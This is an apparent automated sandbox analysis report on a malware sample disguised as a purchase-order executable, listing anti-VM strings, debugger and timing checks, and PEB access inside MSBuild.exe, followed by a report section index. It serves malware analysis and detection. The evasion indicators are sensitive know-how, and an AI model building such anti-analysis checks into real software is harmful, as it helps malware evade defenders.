Source: explorer.exe, 00000003.00000000.274132486.0000000008270000.00000002.00000001.sdmp	Binary or memory string: A communication protocol error has occurred between the Hyper-V Host and Guest Compute Service.
Source: explorer.exe, 00000003.00000000.274132486.0000000008270000.00000002.00000001.sdmp	Binary or memory string: The communication protocol version between the Hyper-V Host and Guest Compute Services is not supported.
Source: explorer.exe, 00000003.00000000.274567797.00000000089B5000.00000004.00000001.sdmp	Binary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&0000002
Source: Purchase Order 40,7045$.exe, 00000000.00000002.259984630.0000000002D51000.00000004.00000001.sdmp	Binary or memory string: VMware SVGA II
Source: Purchase Order 40,7045$.exe, 00000000.00000002.260399670.000000000309F000.00000004.00000001.sdmp	Binary or memory string: VMware
Source: Purchase Order 40,7045$.exe, 00000000.00000002.260399670.000000000309F000.00000004.00000001.sdmp	Binary or memory string: VMWARE"SOFTWARE\VMware, Inc.\VMware ToolsLHARDWARE\DEVICEMAP\Scsi\Scsi Port 1\Scsi Bus 0\Target Id 0\Logical Unit Id 0LHARDWARE\DEVICEMAP\Scsi\Scsi Port 2\Scsi Bus 0\Target Id 0\Logical Unit Id 0'SYSTEM\ControlSet001\Services\Disk\Enum
Source: Purchase Order 40,7045$.exe, 00000000.00000002.260399670.000000000309F000.00000004.00000001.sdmp	Binary or memory string: vmwareNSYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000
Source: Purchase Order 40,7045$.exe, 00000000.00000002.259984630.0000000002D51000.00000004.00000001.sdmp	Binary or memory string: l"SOFTWARE\VMware, Inc.\VMware Tools
Source: explorer.exe, 00000003.00000000.274132486.0000000008270000.00000002.00000001.sdmp	Binary or memory string: An unknown internal message was received by the Hyper-V Compute Service.

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

Process information queried: ProcessInformation

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process queried: DebugPort
Source: C:\Windows\SysWOW64\raserver.exe	Process queried: DebugPort

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

Code function: 1_2_004086A0 rdtsc

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

Code function: 1_2_00409900 LdrLoadDll,

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 1_2_0150B944 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 1_2_0150B944 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 1_2_014EC962 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 1_2_014EB171 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 1_2_014EB171 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 1_2_014E9100 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 1_2_014E9100 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 1_2_014E9100 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 1_2_0151513A mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 1_2_0151513A mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 1_2_01504120 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 1_2_01504120 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 1_2_01504120 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 1_2_01504120 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 1_2_01504120 mov ecx, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 1_2_014EB1E1 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 1_2_014EB1E1 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 1_2_014EB1E1 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 1_2_015741E8 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 1_2_01512990 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 1_2_0150C182 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 1_2_0151A185 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 1_2_015651BE mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 1_2_015651BE mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 1_2_015651BE mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 1_2_015651BE mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 1_2_015099BF mov ecx, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 1_2_015099BF mov ecx, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 1_2_015099BF mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 1_2_015099BF mov ecx, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 1_2_015099BF mov ecx, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 1_2_015099BF mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 1_2_015099BF mov ecx, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 1_2_015099BF mov ecx, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 1_2_015099BF mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 1_2_015099BF mov ecx, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 1_2_015099BF mov ecx, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 1_2_015099BF mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 1_2_015669A6 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 1_2_015161A0 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 1_2_015161A0 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 1_2_015A49A4 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 1_2_015A49A4 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 1_2_015A49A4 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 1_2_015A49A4 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 1_2_01500050 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 1_2_01500050 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 1_2_015A2073 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 1_2_015B1074 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 1_2_01567016 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code function: 1_2_01567016 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Code funct

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading ...

Warning!

Analysis Report Purchase Order 40,7045$.exe

Overview

General Information

Detection

Signatures

Classification

Startup

Malware Configuration

Yara Overview

Memory Dumps

Unpacked PEs

Sigma Overview

Signature Overview

AV Detection:

Software Vulnerabilities:

Networking:

Key, Mouse, Clipboard, Microphone and Screen Capturing:

E-Banking Fraud:

System Summary:

Data Obfuscation:

Hooking and other Techniques for Hiding and Protection:

Malware Analysis System Evasion:

Anti Debugging: